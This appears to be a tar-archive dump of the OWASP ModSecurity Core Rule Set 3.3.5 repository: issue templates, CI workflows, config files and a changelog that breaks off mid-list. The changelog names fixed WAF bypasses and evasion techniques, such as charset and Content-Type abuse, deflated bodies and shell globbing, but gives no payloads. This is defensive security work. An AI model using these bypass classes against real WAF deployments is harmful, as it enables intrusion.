pax_global_header00006660000000000000000000000064144612251510014513gustar00rootroot0000000000000052 comment=c63e314e1dabcd8d5e3b364855360b2a1524f06c modsecurity-crs-3.3.5/000077500000000000000000000000001446122515100146575ustar00rootroot00000000000000modsecurity-crs-3.3.5/.github/000077500000000000000000000000001446122515100162175ustar00rootroot00000000000000modsecurity-crs-3.3.5/.github/ISSUE_TEMPLATE/000077500000000000000000000000001446122515100204025ustar00rootroot00000000000000modsecurity-crs-3.3.5/.github/ISSUE_TEMPLATE/01_false-positive.md000066400000000000000000000016451446122515100241640ustar00rootroot00000000000000--- name: 'False positive' about: Report a false positive (incorrect blocking) title: '' labels: 'False Positive' assignees: '' --- ### Description ### Audit Logs / Triggered Rule Numbers ### Your Environment * CRS version (e.g., v3.2.0): * Paranoia level setting: * ModSecurity version (e.g., 2.9.3): * Web Server and version (e.g., apache 2.4.41): * Operating System and version: ### Confirmation [ ] I have removed any personal data (email addresses, IP addresses, passwords, domain names) from any logs posted. modsecurity-crs-3.3.5/.github/ISSUE_TEMPLATE/02_false-negative.md000066400000000000000000000017301446122515100241200ustar00rootroot00000000000000--- name: 'False negative' about: Report a false negative (incorrect bypass) title: '' labels: 'False Negative - Evasion' assignees: '' --- ### Description ### Your Environment * CRS version (e.g., v3.2.0): * Paranoia level setting: * ModSecurity version (e.g., 2.9.3): * Web Server and version (e.g., apache 2.4.41): * Operating System and version: ### Confirmation [ ] I have removed any personal data (email addresses, IP addresses, passwords, domain names) from any logs posted. 
modsecurity-crs-3.3.5/.github/ISSUE_TEMPLATE/03_bug-report.md000066400000000000000000000016271446122515100233220ustar00rootroot00000000000000--- name: '🐞 Bug report' about: Create a report to help us improve title: '' labels: 'Bug' assignees: '' --- ### Describe the bug ### Steps to reproduce ### Expected behaviour ### Actual behaviour ### Additional context ### Your Environment * CRS version (e.g., v3.2.0): * Paranoia level setting: * ModSecurity version (e.g., 2.9.3): * Web Server and version (e.g., apache 2.4.41): * Operating System and version: modsecurity-crs-3.3.5/.github/ISSUE_TEMPLATE/04_feature.md000066400000000000000000000013211446122515100226570ustar00rootroot00000000000000--- name: '🚀 Feature request' about: Suggest an idea for this project title: '' labels: 'Feature Request' assignees: '' --- ### Motivation ### Proposed solution ### Alternatives ### Additional context modsecurity-crs-3.3.5/.github/ISSUE_TEMPLATE/config.yml000066400000000000000000000006331446122515100223740ustar00rootroot00000000000000blank_issues_enabled: false contact_links: - name: Help and support url: https://security.stackexchange.com/questions/tagged/owasp-crs about: For help and support please go here. - name: OWASP Core Rule Set mailing list url: https://groups.google.com/a/owasp.org/forum/#!forum/modsecurity-core-rule-set-project about: Ask general usage questions and participate in discussions on the CRS. 
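modsecurity-crs-3.3.5/.github/workflows/000077500000000000000000000000001446122515100202545ustar00rootroot00000000000000
modsecurity-crs-3.3.5/.github/workflows/lint.yaml000066400000000000000000000015031446122515100221050ustar00rootroot00000000000000
---
# Lint workflow: runs yamllint over the regression tests, linelint over the
# repository, and secrules-parser over rules/*.conf on every push and PR.
name: Lint

on: [push, pull_request]

# Least privilege: no step below writes to the repository, so the job token
# is limited to reading its contents.
permissions:
  contents: read

jobs:
  check-syntax:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: true  # check why is failing and change afterwards
    steps:
      - name: Checkout repo
        uses: actions/checkout@v2

      - name: Lint Yaml
        uses: ibiqlik/action-yamllint@v3
        with:
          format: github
          file_or_dir: tests/regression/tests
          config_file: .yamllint.yml

      # NOTE(review): this third-party action is referenced by branch name,
      # so whatever that branch points to at run time executes in this job.
      # Pin it to a reviewed commit SHA.
      - name: Linelint
        uses: fernandrone/linelint@master
        id: linelint

      - name: Set up Python 3
        uses: actions/setup-python@v2
        with:
          # Quoted so the version is always read as a string, never a float.
          python-version: '3.7'

      # NOTE(review): both pip installs are unpinned, so every run takes the
      # newest release from the package index. Pin the versions (ideally
      # with hashes) to keep the lint reproducible.
      - name: "Check CRS syntax"
        run: |
          pip install --upgrade setuptools
          pip install secrules-parsing
          secrules-parser -c --output-type github -f rules/*.conf
modsecurity-crs-3.3.5/.github/workflows/stale.yml000066400000000000000000000007161446122515100221130ustar00rootroot00000000000000
---
# Stale workflow: once a day (cron "0 0 * * *") marks issues stale after
# 120 days and closes them 14 days later.
name: Mark stale issues

on:
  schedule:
    - cron: "0 0 * * *"

# Least privilege: the token is granted only the scopes an issue/PR
# labelling and closing job needs.
permissions:
  issues: write
  pull-requests: write

jobs:
  stale:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/stale@v1
        with:
          repo-token: ${{ secrets.GITHUB_TOKEN }}
          stale-issue-message: >-
            This issue has been open 120 days with no activity.
            Remove the stale label or comment, or this will be closed in 14 days
          stale-issue-label: 'Stale issue'
          days-before-stale: 120
          days-before-close: 14
modsecurity-crs-3.3.5/.github/workflows/test.yml000066400000000000000000000035511446122515100217620ustar00rootroot00000000000000
---
# Regression workflow: starts the WAF container from tests/docker-compose.yml
# and runs the go-ftw regression suite against it whenever rules/, tests/ or
# .github/ change.
name: Regression Tests

on:
  push:
    paths:
      - 'rules/**'
      - 'tests/**'
      - '.github/**'
  pull_request:
    paths:
      - 'rules/**'
      - 'tests/**'
      - '.github/**'

# Least privilege: the token is only used to download a release asset.
permissions:
  contents: read

jobs:
  regression:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        modsec_version: [modsec2-apache]
    steps:
      - name: "Checkout repo"
        uses: actions/checkout@v3

      # The go-ftw release is version-pinned through GO_FTW_VERSION.
      # NOTE(review): the downloaded tarball is unpacked without a checksum
      # comparison; consider verifying it against a recorded digest.
      - name: "Install dependencies"
        env:
          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
          GO_FTW_VERSION: '0.4.6'
        run: |
          gh release download -R coreruleset/go-ftw v${GO_FTW_VERSION} -p "ftw_${GO_FTW_VERSION}_linux_amd64.tar.gz" -O - |
            tar -xzvf - ftw

      # matrix.modsec_version is substituted into the script text before the
      # shell runs. Its only value is the static matrix entry above; keep it
      # that way and never feed it from event data.
      - name: "Run tests for ${{ matrix.modsec_version }}"
        run: |
          mkdir -p tests/logs/${{ matrix.modsec_version }}/{nginx,apache2}
          docker-compose -f ./tests/docker-compose.yml up -d "${{ matrix.modsec_version }}"
          docker-compose -f ./tests/docker-compose.yml logs
          # Quoted so that empty output from a failed inspect is compared as
          # an empty string instead of breaking the test expression.
          [ "$(docker inspect ${{ matrix.modsec_version }} --format='{{.State.Running}}')" = 'true' ]
          ./ftw check -d tests/regression/tests
          ./ftw run -d tests/regression/tests --show-failures-only
        env:
          # Hard-coded to the single matrix entry; adjust if the matrix grows.
          FTW_LOGFILE: './tests/logs/modsec2-apache/error.log'

      - name: "Change permissions if failed"
        if: failure()
        run: |
          # we want to get the audit log, so change permissions (file is only for root on docker)
          sudo chmod 644 tests/logs/${{ matrix.modsec_version }}/modsec_audit.log

      # NOTE(review): audit logs hold full request data from the test run;
      # anyone who can read the workflow's artifacts can read them.
      - uses: actions/upload-artifact@v2
        if: failure()
        with:
          name: waf-logs
          path: tests/logs/${{ matrix.modsec_version }}

      - name: Clean docker-compose
        run: |
          docker-compose -f ./tests/docker-compose.yml stop "${{ matrix.modsec_version }}"
          docker-compose -f ./tests/docker-compose.yml down
modsecurity-crs-3.3.5/.gitignore000066400000000000000000000005771446122515100166600ustar00rootroot00000000000000
*.swp
*.swo

# User configuration
crs-setup.conf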
rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf # The MaxMind GeoIP database can be downloaded or upgraded by running: # util/upgrade.py geoip util/geo-location/GeoIP.dat # Unit test caches .cache # Byte-compiled / optimized / DLL files __pycache__/ *.py[cod] *$py.class .idea/ modsecurity-crs-3.3.5/.gitmodules000066400000000000000000000002361446122515100170350ustar00rootroot00000000000000[submodule "docs/OWASP-CRS-Documentation"] path = docs/OWASP-CRS-Documentation url = https://github.com/SpiderLabs/OWASP-CRS-Documentation branch = master modsecurity-crs-3.3.5/.linelint.yml000066400000000000000000000004371446122515100173020ustar00rootroot00000000000000rules: # checks if file ends in a newline character end-of-file: # set to true to enable this rule enable: true # set to true to disable autofix (if enabled globally) disable-autofix: true # will be ignored only by this rule ignore: - .pytest_cache/* modsecurity-crs-3.3.5/.travis.yml000066400000000000000000000013041446122515100167660ustar00rootroot00000000000000os: linux language: python python: - 2.7 # no more required in travis #sudo: required services: - docker jobs: include: script: - | if [[ "$TRAVIS_PULL_REQUEST" != "false" ]]; then docker run -ti --name crs-test --entrypoint /docker-entrypoint.sh -e REPO=$TRAVIS_PULL_REQUEST_SLUG -e BRANCH=$TRAVIS_PULL_REQUEST_BRANCH themiddle/crs-test else docker run -ti --name crs-test --entrypoint /docker-entrypoint.sh -e REPO=$TRAVIS_REPO_SLUG -e BRANCH=$TRAVIS_BRANCH themiddle/crs-test fi # safelist branches: only: - v3.1/dev - v3.2/dev - v3.3/dev - fix-travis #notifications: # irc: "chat.freenode.net#modsecurity" modsecurity-crs-3.3.5/.yamllint.yml000066400000000000000000000011251446122515100173100ustar00rootroot00000000000000extends: default rules: # Test lines can be big line-length: max: 1024 level: warning # These files below have very large lines, needed for the test. # So they will raise warnings every time. 
ignore: | tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920380.yaml tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920390.yaml tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml # don't bother me with this rule indentation: disable comments: require-starting-space: true # default min-spaces-from-content: 1 modsecurity-crs-3.3.5/CHANGES.md000066400000000000000000002260131446122515100162550ustar00rootroot00000000000000# OWASP ModSecurity Core Rule Set (CRS) CHANGES ## Report Bugs/Issues to GitHub Issues Tracker or the mailinglist * or the CRS Google Group at * ## Version 3.3.5 - 2023-07-18 Important changes: * Backport fix for CVE-2023-38199 from CRS v4 via new rule 920620 (Andrea Menin, Felipe Zipitría) Fixes: * Fix paranoia level-related scoring issue in rule 921422 (Walter Hop) * Move auditLogParts actions to the end of chained rules where used (Ervin Hegedus) Chore: * Clean up redundant paranoia level tags (Ervin Hegedus) * Clean up YAML test files to support go-ftw testing framework (Felipe Zipitría) * Move testing framework from ftw to go-ftw (Felipe Zipitría) ## Version 3.3.4 - 2022-09-20 Fixes and improvements: * Fix a regression in our former release, with the impact that some Paranoia Level 2 rules would activate even when running in Paranoia Level 1. (Simon Studer, Walter Hop) ## Version 3.3.3 - 2022-09-19 Important changes: * This update requires ModSecurity version 2.9.6 or 3.0.8 (or an updated version with backports of the security fixes in these versions) or a compatible engine supporting these changes. If you do not upgrade ModSecurity, the file REQUEST-922-MULTIPART-ATTACK.conf will cause ModSecurity to fail to start. In that case, you can temporarily delete that file. However, you will be missing protection from these rules. Therefore, we recommend upgrading your ModSecurity or other engine instead. * By default, the request headers "Accept-Charset" and "Content-Encoding" are now blocked to prevent a WAF bypass. 
Especially the "Accept-Charset" header may be in use by clients. If you need to serve clients that send this header, uncomment and edit rule 900250 in crs-setup.conf. Fixes and improvements: * Fix CVE-2022-39955 Multiple charsets defined in Content-Type header (Jan Gora) * Fix CVE-2022-39956 Content-Type or Content-Transfer-Encoding MIME header fields abuse (Jan Gora, Felipe Zipitria) * Fix CVE-2022-39957 Charset accept header field resulting in response rule set bypass (Karel Knibbe, Max Leske) * Fix CVE-2022-39958 Small range header leading to response rule set bypass (Hussein Daher, Christian Folini) * Fix MIME header abuse via _charset_ field (Jan Gora, Felipe Zipitria) * Fix bypass using deflated request body (Karel Knibbe) * Fix request body partial rule set bypass via Content-Type "text/plain" (Pinaki Mondal, Andrea Menin) * Fix XML Body Parser abuse for non-XML request bodies (Jan Gora) * Fix body processor bypass by content-type outside the mime type declaration (Jan Gora, Simon Studer, Ervin Hegedus) ## Version 3.3.2 - 2021-06-30 Fixes and improvements: * Fix CVE-2021-35368 WAF bypass using pathinfo (Christian Folini) ## Version 3.3.0 - 2020-07-01 Important changes: * The format of crs-setup.conf variable "tx.allowed_request_content_type" has been changed to be more in line with the other variables. If you have overridden this variable, please see the example in crs-setup.conf for the new separator to use. 
New functionality: * Block backup files ending with ~ in filename (Andrea Menin) * Detect ffuf vuln scanner (Will Woodson) * Detect Nuclei vuln scanner (azurit) * Detect SemrushBot crawler (Christian Folini) * Detect WFuzz vuln scanner (azurit) * New LDAP injection rule (Christian Folini) * New HTTP Splitting rule (Andrea Menin) * Add .swp to restricted extensions (Andrea Menin) * Allow CloudEvents content types (Bobby Earl) * Add CAPEC tags for attack classification (Fernando Outeda, Christian Folini) * Detect Unix RCE bypass techniques via uninitialized variables, string concatenations and globbing patterns (Andrea Menin) Removed functionality: * Removed outdated rule tags WASCTC, OWASP_TOP_10, OWASP_AppSensor/RE1, and OWASP_CRS/FOO/BAR; note that tags 'OWASP_CRS' and 'attack-type' are kept. (Christian Folini) Improved compatibility: * Changed variable to lowercase (modsec3 behavior fix) (Ervin Hegedus) Fixes and improvements: * WordPress: Add support for upload image/media in Gutenberg Editor (agusmu) * Prevent bypass of rule 921110 (Amit Klein, Franziska Bühler) * Prevent bypass of rule 921130 (Amit Klein, Franziska Bühler) * fix CVE msg in rules 944120 944240 (Fernando Outeda) * Remove broken or no longer used files (Federico G. Schwindt) * Make content-type case insensitive (Franziska Bühler) * Move /util/docker folder from v3.3/dev branch to dedicated repo (Peter Bittner) * feat(lint): split actions in linting and regression (Felipe Zipitria) * Fix FP in 921120 (Franziska Bühler) * Add missing OWASP_CRS tags (Christian Folini) * Fix GHA badges (Federico G. Schwindt) * feat(badge): add apache license badge * fix typos found by fossies codespell (Tim Herren) * Decrease processing time of rules (Ervin Hegedüs) * handle multiple directives in 920510 (Andrea Menin) * handle multiple directives in 920510 (Andrea Menin) * fix(ci): use log_contains instead (Felipe Zipitria) * Move test where it belongs (Federico G. 
Schwindt) * fix(ci): use docker in DetectionOnly (Felipe Zipitria) * fix(rule): remove dangling whitespace (Felipe Zipitria) * fix(ci): run actions on .github change (Felipe Zipitria) * fix(docs): update badges and links in readme (Felipe Zipitria) * README: update repo link (Walter Hop) * Update README: Copyright 2019 -> 2020 (Christian Folini) * fix(ci): run tests also on PRs (Felipe Zipitria) * fix(ci): change test name and fix default params (Felipe Zipitria) * Restore Travis Status (was in the wrong repo) (Christian Folini) * Remove outdated Travis status after migration (Christian Folini) * feat(ci): adds github actions testing (Felipe Zipitria) * fix(migration): post migration tasks (Felipe Zipitria) * feat(templates): add text to github templates about migration. To be reverted after migration is done. (Felipe Zipitria) * Added more explanations to comment of 920300 (Christian Folini) * Added 'ver' action with current version to all necessary rules (Ervin Hegedus) * Update nextcloud excl rules and shorten var (Franziska Bühler) * Change to preferred lowercase var (Franziska Bühler) * Set var to lowercase and change comment (Franziska Bühler) * Resolve issue with allowed_request_content_types (Franziska Bühler) * Allow REPORT requests without Content-Type header in Nextcloud (pyllyukko) * Suppress rule 200002 when editing contacts in Nextcloud (pyllyukko) * XenForo: update exclusions (Walter Hop) * WordPress: exclude additional URL fields in profile editor (Walter Hop) * add www to link (NullIsNot0) * Fix link for 941310 Old link does not work anymore. Change it to new one. 
(NullIsNot0) * Add Content-Type: multipart/related as allowed default (jeremyjpj0916) * Resolve issue 1722 and fix content-type whitelisting (Franziska Bühler) * make severities and scores consistent (Walter Hop) * add QQGameHall UA (#1731) (Andrea Menin) * another test (Allan Boll) * Add word boundaries around values in SQL tautologies (942130) (Allan Boll) * Move tests to their own file, while here also correct permissions for 920180. (Federico G. Schwindt) * Rule to check if both C-L and T-E are present (#1310) (Federico G. Schwindt) * Fixes for 2 tests in 921200 (Christian Folini) * XenForo: add exclusions, remove unnecessary chains (#1673) (Walter Hop) * Fix FPs for 942350 (#1706) (Franziska Bühler) * Fix typos found by codespell / Fossies project (#1702) (Simon Studer) * Ignore check of CT header in POST request if protocol is HTTP/2 (Ervin Hegedus) * Narrowing down the subpattern .*? in 941130 (Christian Folini) * Restricting a wide regex a bit (Christian Folini) * Drop escapes (Christian Folini) * Fix FP in 941130 and rearrange regex with new regex-assemble file (Christian Folini) * Ignore check of CT header in POST request if protocol is HTTP/2 (Ervin Hegedus) * Remove trailing dot in several msg actions (#1678) (Tim Herren) * Replace REQUEST_BODY with ARGS on 930100 and 930110 (#1659) (Andrea Menin) * Temporary travis workaround to buy time and fix it for good (#1684) (Andrea Menin) * Add regression tests (Franziska Bühler) * Fix FP with create with 942360 (Franziska Bühler) * Avoid embedded anchors in CRS rule 942330 (Allan Boll) * Update 942450 for less false positives, more tests (#1662) (Will Woodson) * Ensure single ranges are also checked (#1661) (Federico G. Schwindt) * WordPress: also exclude posts/pages endpoint in subdirectories (Walter Hop) * For bugs, also ask for the environment (#1657) (Federico G. 
Schwindt) * XenForo: fix incorrect escape (Walter Hop) * XenForo: additional exclusions (Walter Hop) * Pattern cleanup across several rules (#1643). Drop unneeded non-capture groups; No need to escape "-" outside character classes And only if it is not at the end. (Federico G. Schwindt) * Improve rule 941350: Previously, this rule will also match on the equivalent to "<..<". Rewrite it so it is only triggered by the equivalent to "<..>", simplifying the pattern quite a bit as a bonus. While here add a link describing the bypass for future reference. * Fix test Was using the equivalent to "<...<" instead of "<...>". (Federico G. Schwindt) * Move the help and support link to contacts (#1647) While here rename to ensure they are presented in the right order and minor cosmetics. (Federico G. Schwindt) * Move remaining regression test data file to new folder, cleanup README (#1646) (Peter Bittner) * Also ask for the paranoia level (Federico G. Schwindt) * Make it a tiny bit more colorful (Federico G. Schwindt) * Spacing (Federico G. Schwindt) * Fix emoji (Federico G. Schwindt) * Switch to multiple templates for github issues (#1644) (Federico G. Schwindt) * Fix paranoia-level log description (Andrea Menin) * change IRC to Slack (Walter Hop) * fix spacing (Walter Hop) * Moving tests and documentation folders (#1627) (Soufiane Benali) * add triggered rule (#1636) (Andrea Menin) * Drop the translate header from the restricted list Fixes #1410. (Federico G. Schwindt) * Mark stale issues (Federico G. Schwindt) * Added support for >). Use negated classes for better performance. (Federico G. Schwindt) * Add test for issue #1580 (#1612) (Federico G. Schwindt) * removes t:lowercase (Andrea Menin) * Move integration tests to their own job (#1608) Also cleanup branches' list. (Federico G. Schwindt) * Add PL1 tag. 
(Anna Winkler) * Change version number for full version name (Felipe Zipitria) * Better document legacy conversion procedure Add text with instructions for a simple conversion utility. (Felipe Zipitria) * Correct example text regarding GeoIP. Add maxmind tool for downloading files (Felipe Zipitria) * Ignore configuration files generated by the JetBrains editors (Anna Winkler) * Update name of branch to use for feature branches. Minor syntax updates. (Anna Winkler) * Minor optimisation (Emile-Hugo SPIR) * Also fix the `as herefrom` pattern (Emile-Hugo SPIR) * More conservative fix (Emile-Hugo SPIR) * Update the source file (Emile-Hugo SPIR) * Fix a FP (`, aside from`) (Emile-Hugo SPIR) * regression fix for #1581 (emphazer) * Change order to check ip first in both rules (Felipe Zipitria) * Change chain order (Felipe Zipitria) * Fix spacing in text (Felipe Zipitria) * Add link to mailing list archives (Felipe Zipitria) * Adding new test for 941150 based on XSS cheatsheet by portswigger (Christian Folini) * Adding new test for 941340 based on XSS cheatsheet by portswigger (Christian Folini) * Adding new test for 941280 based on XSS cheatsheet by portswigger (Christian Folini) * Adding new test for 941170 based on XSS cheatsheet by portswigger (Christian Folini) * Adding new test for 941250 based on XSS cheatsheet by portswigger (Christian Folini) * Adding new test for 941220 based on XSS cheatsheet by portswigger (Christian Folini) * Adding new test for 941330 based on XSS cheatsheet by portswigger (Christian Folini) * Adding new test for 941300 based on XSS cheatsheet by portswigger (Christian Folini) * Adding new test for 941230 based on XSS cheatsheet by portswigger (Christian Folini) * Adding new test for 941260 based on XSS cheatsheet by portswigger (Christian Folini) * Adding new test for 941290 based on XSS cheatsheet by portswigger (Christian Folini) * Adding new test for 941270 based on XSS cheatsheet by portswigger (Christian Folini) * Adding new test for 
942180 based on XSS cheatsheet by portswigger (Christian Folini) * Update mailing list links to google group (Felipe Zipitria) * Fix typo and add 2 new entries to 941160 (Franziska Bühler) * Switch to dates in YYYY-MM-DD format IOW iso 8601. While here add newlines and drop empty categories. (Federico G. Schwindt) * Update badges, add v3.3 and remove v3.0 (#1557) (Federico G. Schwindt) * Rearrange characters and add positive and negative test cases. Moved the dash to the end of the character set to avoid escaping it. Added test with all the new characters and a test for multiple whitespaces. Allowed a previously blocked charset. (Tim Herren) * 920470: include chars from rfc 2046. RFC 2046 allows additional chars for the boundary. \d removed as it is covered by \w in the regex. Removed unnecessary escapes. (Tim Herren) * Fix bypass in 931130. Don't rely on beginsWith as it might allow attackers to create subdomains matching the prefix. Add tests to cover this and other cases. The latter fixes #1404. (Federico G. Schwindt) * fix rule regex due to remove t:removeComments (Andrea Menin) * 920470: include chars from rfc 2046. RFC 2046 allows additional chars for the boundary. \d removed as it is covered by \w in the regex. Removed unnecessary escapes. 
(Tim Herren) * update Dockerfiles and Travis to use v3.3/dev (Walter Hop) ## Version 3.2.0 - 2019-09-24 New functionality: * Add AngularJS client side template injection 941380 PL2 (Franziska Bühler) * Add docker-compose.yaml and example rule exclusion files for docker-compose (Franziska Bühler) * Add extended access.log format to Docker (Franziska Bühler) * Add libinjection check on last path segment (Max Leske, Christian Folini) * Add PUBLIC identifier for XML entities (#1490) (Rufus125) * Add .rdb to default restricted_extensions (Walter Hop) * Add .swp to default restricted_extensions (Andrea Menin) * Add rule 933200 PHP Wrappers (Andrea Menin) * Add send-payload-pls.sh script to test payload against multiple paranoia levels (Christian Folini, Manuel Spartan) * Add support for shell evasions with $IFS (Walter Hop, Chaim Sanders) * Add unix-shell commands (Christoph Hansen, Chaim Sanders) * Also inspect the path for the script tag (Federico G. Schwindt) * Detect 80legs, sysscan, Gobuster scanners (Brent Clark) * Detect CGI source code leakages (Christoph Hansen, Walter Hop) * Detect 'crawler' user-agent (Federico G. Schwindt) * Detect Jorgee, Zgrab scanners (Walter Hop) * Detect MySQL in-line comments (Franziska Bühler) * Detect Wappalyzer scanner (Christian Folini, Chaim Sanders) * Java RCE: Add struts namespaces (Walter Hop) * Java RCE: Detect more java classes (Manuel Leos) * Javascript: Add 941370 preventing a bypass for 941180 (Andrea Menin) * Make CRS variables configurable in Docker image (Franziska Bühler) * New PL3 rule 920490 to protect against content-type charset bypassing (Christian Folini) * Node.js unserialization + javascript RCE snippets (Walter Hop) * Request smuggling: Also cover pre http/1.0 requests (Federico G. 
Schwindt) * Restricted files: Added many dotfiles (Dan Ehrlich) * SQLi bypass detection: ticks and backticks (Franziska Bühler) * XenForo rule exclusion profile (Walter Hop) Removed functionality: * Remove unused protected_uploads setting from setup (Walter Hop) * Remove deprecated tx.msg and tx.%{rule.id}-... (Federico G. Schwindt) * Remove deprecated upgrade script (Walter Hop) Improved compatibility: * Add OWASP_CRS tags for ModSec 3 changes and replace ruleRemoveTargetByTag arguments (Ervin Hegedus) * Replace @contain % with @rx 25; ModSec 3 fails to parse % by itself (or escaped). (Federico G. Schwindt) * RE2 compatibility for 941130, 920220, 920240, 920230, 920460, 942200, 942370 (Allan Boll) * Hyperscan compatibility and simplification for 942450 (Allan Boll) Fixes and improvements: * 932140: fix ReDoS in FOR expression (Walter Hop) * 933200: Simplify pattern (Federico G. Schwindt, Andrea Menin) * 941380: fix anomaly score variable (Franziska Bühler) * 942510, 942511: fix anomaly score variable (Walter Hop) * Add content-type application/csp-report (Andrea Menin) * Add content-type application/xss-auditor-report (Andrea Menin) * Add CRS 3.2 Badge build support. (Chaim Sanders) * Add CVE numbers for Apache Struts vulnerabilities to comments in rules (Franziska Bühler) * Add CVE-2018-11776 to comments of 933160 and 933161 (Franziska Bühler) * Add CVE-2018-2380 to comments of rules (Franziska Bühler) * Add default env vars for anomaly scores in Docker (Franziska Bühler) * Add missing OWASP_CRS tags to 921xxx rules (Walter Hop) * Add REQUEST_FILENAME to rule id 944130 and add exploits to comment (Franziska Bühler) * Add spaces in front of closing square brackets (Franziska Bühler) * Add travis changes (#1316) (Chaim Sanders) * Allow dot characters in Content-Type multipart boundary (Walter Hop) * Also handle dot variant of X_Filename. PHP will transform dots to underscore in variable names since dot is invalid. (Federico G. 
Schwindt) * As per the ref manual, it is compressWhitespace (Federico G. Schwindt) * Avoid php leak false positive with WOFF files (Manuel Spartan) * Bring back CRS 2.x renumbering utility (Walter Hop) * Clean up travis and reorg (Federico G. Schwindt) * Code cosmetics: reorder the actions of rules (Ervin Hegedus) * Content-Type is case insensitive (Federico G. Schwindt) * Disassembled 941160 (Franziska Bühler) * Drop separate regexp files. They are not really needed and save us from updating multiple places. (Federico G. Schwindt) * Drop t:lowercase from 941350 (Federico G. Schwindt) * Drop unneeded capture groups and tidy up (Federico G. Schwindt) * Drop unneeded capture groups and tidy up regexps (Federico G. Schwindt) * Drop unneeded unicode from 941110. Add tests to cover a few more variants as well as a negative test (Federico G. Schwindt) * Fix 920440 "URL file extension is restricted by policy" regex (Andrea Menin) * Fix 920460 test (Federico G. Schwindt) * Fix 942101 and 942460 by adding to sqli_score variable (Christian Folini) * Fix checking the existence of 'HTTP' trailing request verb and request path in the payload for HTTP request smuggling; decreases false-positives on free-form text. (Yu Yagihashi) * Fix commit default for non 2.9 branch (Chaim Sanders) * Fix CRS2->CRS3 mapping table (973344 -> 941100) (Chaim Sanders) * Fix date (Chaim Sanders) * Fix Docker image SSL support (Franziska Bühler) * Fix duplicate .env (jschleus, Chaim Sanders) * Fix executing paranoia level counters (Christian Folini) * Fix indentation and python version in crs2-renumbering script (Chaim Sanders) * Fix input / headers misordering (Christian Folini) * Fix path traversal attack pattern at id:930110 (Ervin Hegedus) * Fix regexp in Docker image (Franziska Bühler) * Fix regexp with incorrect dot '.' escape in rule 943120 (XeroChen) * Fix request header Sec-Fetch-User false positive (na1ex) * Fix runaway regexp in 942260. 
Add variant regexp assemble script to handle possessive qualifiers. Use possessive qualifiers to tight this up and solve ReDoS problem. (Federico G. Schwindt) * Fix small typo in variable (Felipe Zipitria) * Fix spelling error in variable name (supplient) * Fix transform name pointed out by secrules_parsing (Federico G. Schwindt) * Fix Travis Merge not being able to find HEAD (Chaim Sanders) * Fix vulnerable regexp in rule 942490 (CVE-2019-11387) (Christoph Hansen) * Fix wrong regex, assembly result, in 942370 (Franziska Bühler) * INSTALL: advise to use release zips, remove upgrade.py, update Nginx (Walter Hop) * Java: change tag from COMMAND_INJECTION to JAVA_INJECTION (Manuel Spartan) * Jwall auditconsole outbound anomaly scoring requirements (Christoph Hansen) * Mark patterns not supported by re2 (Federico G. Schwindt) * Move duplicated 900270 to 900280 Fixes #1236. (Federico G. Schwindt) * Move PROXYLOCATION var (Franziska Bühler) * PHP: move get_defined_functions() and friends into PL1 (Walter Hop) * Pin the ftw version to 1.1.7 for now (Federico G. Schwindt) * Prevent bypass 933180 PHP Variable Function (Andrea Menin) * Reduce comments, introduction of triggered exploits (Franziska Bühler) * Remove all trailing spaces from ftw yaml test files (Ervin Hegedus) * Remove auditlog No other rules specify it. Add missing quotes and drop rev (Federico G. Schwindt) * Remove capture, remove tx.0, add transformation functions, fix regex, add presentation link (Andrea Menin) * Remove old and unwanted setvar constructs (Federico G. Schwindt) * Remove superfluous comments (Walter Hop) * Remove superfluous pmf (Federico G. Schwindt) * Remove t:lowercase from 920490 (Christian Folini) * Remove WARNING from php-errors.data (Andrea Menin) * Reorder actions (Federico G. 
Schwindt) * Replacing all @pmf with @pmFromFile (Christian Treutler) * Restricted-files.data: add AWS config (Walter Hop) * SQLI: removed unnecessary + (Christoph Hansen) * Switch Docker image to owasp/modsecurity:2.9-apache-ubuntu (Federico G. Schwindt) * unix-shell.data: fix typo in 'more' (Walter Hop) * Update .travis.yml Update to support v3.1 (Chaim Sanders) * Update dockerfile to always use 3.2/dev (Federico G. Schwindt) * Update OWASP CRS Docker image to support the new upstream and 2.9.3 (Peter Bittner, Chaim Sanders) * Update RESPONSE-950-DATA-LEAKAGES.conf (Christoph Hansen) * Update RESPONSE-959-BLOCKING-EVALUATION.conf (Christoph Hansen) * Wordpress: add support for Gutenberg editor (siric_, Walter Hop) * Wordpress: allow searching for any term in admin posts/pages overview (Walter Hop) * WordPress: exclude Gutenberg via rest_route (Walter Hop) * WordPress: exclude some more profile.php fields from RFI rule (Walter Hop) * WordPress: exclude SQL comment rule from _wp_http_referer (Walter Hop) * XML Soap Encoding fix 920240 (Christoph Hansen) Unit tests: * 932140: add regression tests (Walter Hop) * 933180: fix tests which were doing nothing (Walter Hop) * 941370: add some more tests, fix whitespace (Walter Hop) * Add more tests for 941130 (Christian Folini) * Add regression test for 941101 (Avery Wong) * Add regression tests for 942150, 942100, 942260 (Christian Folini) * Add regression tests to 941160 (Franziska Bühler) * Add some regression tests (Ervin Hegedus) * Add testing support for libmodsecurity running on Apache and Nginx (Chaim Sanders) * Add tests for 941360 that fights JSFuck and Hieroglyphy (Christian Folini) * Add tests for rule 921110 (Yu Yagihashi) * Added regression tests for rules 942320, 942360, 942361, 942210, 942380, 942410, 942470, 942120, 942240, 942160, 942190, 942140, 942490, 942120 (Christoph Hansen) * Drop tests for removed rules (Federico G. 
